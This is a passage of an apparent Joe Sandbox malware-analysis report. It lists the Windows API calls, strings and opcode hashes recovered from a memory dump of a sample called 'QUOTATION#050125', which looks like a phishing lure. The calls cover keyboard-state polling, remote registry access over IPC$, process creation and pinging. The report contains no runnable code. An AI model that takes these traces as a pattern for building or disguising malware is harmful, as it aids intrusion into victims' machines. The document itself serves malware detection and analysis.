                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 798235881-1714406822
                                                                                      • Opcode ID: 760f69713b5321131463fec95190ac7a8132f6708318221ccf88951f578287c9
                                                                                      • Instruction ID: 236bb34a75d5f244cce21c7547222afc45e7153933c5d9457546064ce3327cfc
                                                                                      • Opcode Fuzzy Hash: 760f69713b5321131463fec95190ac7a8132f6708318221ccf88951f578287c9
                                                                                      • Instruction Fuzzy Hash: 1C21F932645751EFE7115FB5AC45B6A33E4EB04B62F00012AF841BE692DFF09C808AD0
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 0012E6B4
                                                                                        • Part of subcall function 000DE551: timeGetTime.WINMM(?,?,0012E6D4), ref: 000DE555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 0012E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0012E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0012E727
                                                                                      • SetActiveWindow.USER32 ref: 0012E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0012E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0012E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 0012E77E
                                                                                      • IsWindow.USER32 ref: 0012E78A
                                                                                      • EndDialog.USER32(00000000), ref: 0012E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: f1666b891133d20e7e25230337679ec41063a87a9ab86da56b3d1505cc3b3cef
                                                                                      • Instruction ID: a58cd018d3710180bd8d65ffac8d44d0f9de0e42b03d2402974624867fe727ad
                                                                                      • Opcode Fuzzy Hash: f1666b891133d20e7e25230337679ec41063a87a9ab86da56b3d1505cc3b3cef
                                                                                      • Instruction Fuzzy Hash: 6A21A570204315FFEB105F60FCC9A253BA9F75474AF200426F91686EB2DB71ADE08BA4
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0012EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0012EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0012EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0012EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 890592661-1007645807
                                                                                      • Opcode ID: 2142bb915ad185d3f43c4d5aea8c94bd5a6eb44fe6d9736b7a9bcef4bdf08632
                                                                                      • Instruction ID: 4fea441773fe8b1a09985cf6a30ba43b2cd82b4a57931bd6c05a91cf430b7c37
                                                                                      • Opcode Fuzzy Hash: 2142bb915ad185d3f43c4d5aea8c94bd5a6eb44fe6d9736b7a9bcef4bdf08632
                                                                                      • Instruction Fuzzy Hash: DE112131A902697DD724B7A1EC4AEFF6ABCEBD1B04F400429B411A20D1EF705A55CAB0
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 0012A012
                                                                                      • SetKeyboardState.USER32(?), ref: 0012A07D
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0012A09D
                                                                                      • GetKeyState.USER32(000000A0), ref: 0012A0B4
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0012A0E3
                                                                                      • GetKeyState.USER32(000000A1), ref: 0012A0F4
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0012A120
                                                                                      • GetKeyState.USER32(00000011), ref: 0012A12E
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0012A157
                                                                                      • GetKeyState.USER32(00000012), ref: 0012A165
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0012A18E
                                                                                      • GetKeyState.USER32(0000005B), ref: 0012A19C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 9025b4e355585ff980efb164c19ea2335440ecf858c8ab53cabd6563460a2a35
                                                                                      • Instruction ID: 31eac235040f3ab7f83e59c9af97000a8d3e053d9c4869e1257ca020fd28132a
                                                                                      • Opcode Fuzzy Hash: 9025b4e355585ff980efb164c19ea2335440ecf858c8ab53cabd6563460a2a35
                                                                                      • Instruction Fuzzy Hash: 74513B309047A86BFB35DBB0A9107EABFF49F12380F484589D5C25B1C2DB54AA5CCB63
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00125CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00125D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00125D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00125DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00125E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00125E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00125E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00125E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: d24021537454a9bf3f907bff1e5ebea5b89bb2bab4d9252a0a944edb1858ad3e
                                                                                      • Instruction ID: e0b0a436e47fad12bc0bf8fb4459cd6f825917ef28f508afe612e0341c615152
                                                                                      • Opcode Fuzzy Hash: d24021537454a9bf3f907bff1e5ebea5b89bb2bab4d9252a0a944edb1858ad3e
                                                                                      • Instruction Fuzzy Hash: 23510E71A00719AFDB18CFA8DD89AAEBBB6FB48301F148129F515E6690D7709E50CB60
                                                                                      APIs
                                                                                        • Part of subcall function 000D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000D8BE8,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8FC5
                                                                                      • DestroyWindow.USER32(?), ref: 000D8C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00116973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 001169A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 001169B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000), ref: 001169D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 001169E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 641708696-0
                                                                                      APIs
                                                                                        • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
                                                                                      • GetSysColor.USER32(0000000F), ref: 000D9862
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 259745315-0
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0012369C
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00123797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0012380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 0012385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00123882
                                                                                      • GetParent.USER32(?), ref: 001238A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 001238A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00123921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0012395D
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 1412819556-679674701
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0010F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00129717
                                                                                      • LoadStringW.USER32(00000000,?,0010F7F8,00000001), ref: 00129720
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0010F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00129742
                                                                                      • LoadStringW.USER32(00000000,?,0010F7F8,00000001), ref: 00129745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00129866
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 4072794657-2268648507
                                                                                      APIs
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001207A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001207BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001207DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00120804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0012082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00120837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0012083C
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 3030280669-22481851
                                                                                      APIs
                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00133D40
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00133D9D
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00133DBE
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00133DCE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00133E55
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00133E60
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00133E6B
                                                                                      Similarity
                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                      • String ID: :$\$\??\%s
                                                                                      • API String ID: 3827137101-3457252023
                                                                                      APIs
                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0015403B
                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00154042
                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00154055
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015405D
                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00154068
                                                                                      • DeleteDC.GDI32(00000000), ref: 00154072
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0015407C
                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00154092
                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0015409E
                                                                                      Similarity
                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                      • String ID: static
                                                                                      • API String ID: 2559357485-2160076837
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0014B1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0014B1D4
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0014B214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0014B236
                                                                                        • Part of subcall function 001305A7: GetStdHandle.KERNEL32(000000F6), ref: 001305C6
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0014B3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 0014B407
                                                                                      • CloseHandle.KERNEL32(?), ref: 0014B439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 0014B4E3
                                                                                      Similarity
                                                                                      • API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3101636085-0
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00137AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00137B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00137BA3
                                                                                      • CoCreateInstance.OLE32(0015FD08,00000000,00000001,00186E6C,?), ref: 00137BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00137C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00137CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00137D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00137D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00137D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00137DD6
                                                                                      • CoUninitialize.OLE32 ref: 00137DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00155504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00155515
                                                                                      • CharNextW.USER32(00000158), ref: 00155544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00155585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0015559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001555AC
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 1350042424-0
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0011FAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 0011FB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 0011FB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0011FB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0011FB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 0011FBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011FBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 0011FBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0011FBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011FBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0011FBE9
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00129CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00129D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00129D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00129D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00129D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00129D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00129D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00129DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00129DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00129DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00129DEA
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,0015CC08), ref: 00134527
                                                                                      • GetDriveTypeW.KERNEL32(?,00186BF0,00000061), ref: 00134743
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2426244813-1000479233
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00124994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 001249DA
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 001249F7
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00124A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00124A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00124AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00124B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00124B8B
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 3725905772-1241985126
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 001405BC
                                                                                      • inet_addr.WSOCK32(?), ref: 0014061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 00140628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00140636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001406C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001406E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 001407B9
                                                                                      • WSACleanup.WSOCK32 ref: 001407BF
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 00143774
                                                                                      • CoUninitialize.OLE32 ref: 0014377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0015FB78,?), ref: 001437D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 0014384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 001438E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00143936
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0012DC20
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0012DC46
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0012DCBC
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 2179348866-1459072770
• Opcode ID: 6af5a968e2a67c1cfa923ab09e1f071eae49493f0d6723db5d0b7335fc41bb2c
• Instruction ID: 2a1cc05b5ad6869759eb14e684a51ea5eebc6631de531b13ed35e3c05582e572
• Opcode Fuzzy Hash: 6af5a968e2a67c1cfa923ab09e1f071eae49493f0d6723db5d0b7335fc41bb2c
• Instruction Fuzzy Hash: F641F032940315BEDB04ABA5EC07EFF37ACEF56750F10406AF901B6183EB759A1087A5
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001333CF
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001333F0
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: LoadString
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 2948472770-3080491070
• Opcode ID: 3ec4058028e1994fe5b1ee4dc95d483b269a20ccb2891e310a4065b0b4fc8d68
• Instruction ID: 36e924fd50358d9118c302788eddd9b6c2222d9d206992a04a254c8bf0dac739
• Opcode Fuzzy Hash: 3ec4058028e1994fe5b1ee4dc95d483b269a20ccb2891e310a4065b0b4fc8d68
• Instruction Fuzzy Hash: EA517C7290020ABADF15EBA0DD46EEEB778AF14340F204169F515720A2EB356F98DF61
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001353A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00135416
• GetLastError.KERNEL32 ref: 00135420
• SetErrorMode.KERNEL32(00000000,READY), ref: 001354A7
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 4081636c80a8997c774608b7ae5de75718b1bb8d793b99d4416d7a23f8ebc72c
• Instruction ID: 0315036e26ba01cc1ce12fe7910c2a295f220f09759db5f0bde4934cd67933d9
• Opcode Fuzzy Hash: 4081636c80a8997c774608b7ae5de75718b1bb8d793b99d4416d7a23f8ebc72c
• Instruction Fuzzy Hash: FF318D35A00604DFC718DF68C984FAABBB5EB45715F148069E805DB292EB71DE86CBA0
APIs
• CreateMenu.USER32 ref: 00153C79
